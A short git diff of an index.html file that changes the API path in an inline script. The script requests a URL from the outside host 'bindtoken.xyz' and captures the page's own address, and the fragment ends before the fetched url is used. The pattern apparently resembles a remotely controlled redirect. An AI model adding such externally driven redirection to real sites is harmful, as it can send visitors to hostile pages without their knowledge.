--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
   var api_url = 'https://bindtoken.xyz';
   var domain = window.location.href;
   var xhr = new XMLHttpRequest();
-  xhr.open('GET',api_url+'/api/api/urldata', true);
+  xhr.open('GET',api_url+'/index/api/urldata', true);
   xhr.onreadystatechange = function() {
       if (xhr.readyState === 4 && xhr.status === 200) {
           var url = xhr.responseText
